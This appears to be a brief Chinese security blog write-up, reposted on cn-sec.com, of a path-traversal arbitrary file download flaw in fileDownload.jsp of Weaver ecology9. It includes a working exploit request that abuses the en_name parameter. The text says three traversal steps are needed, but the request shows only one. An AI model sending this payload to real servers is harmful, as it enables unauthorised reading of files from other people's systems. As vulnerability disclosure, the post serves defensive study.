稻草人博客-泛微ecology9任意文件下载

admin 2023年6月15日10:46:30稻草人博客-泛微ecology9任意文件下载已关闭评论96 views字数 223阅读0分44秒阅读模式

漏洞原理

fileDownload.jsp获取可控的en_name参数进行文件下载,由于未过滤“../”所以可通过目录穿越的方式下载任意文件
blockchain

漏洞利用

请求包输入

//system/upgradetoe9/fileDownload.jsp?en_name=\..\RecoverMain.jsp&cn_name=文件名

该文件路径为system\upgradetoe9\resource需要穿越三次到达根目录
blockchain

总结

该漏洞或许已经公开原因,世面上修复的比较全面

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月15日10:46:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   稻草人博客-泛微ecology9任意文件下载https://cn-sec.com/archives/1803628.html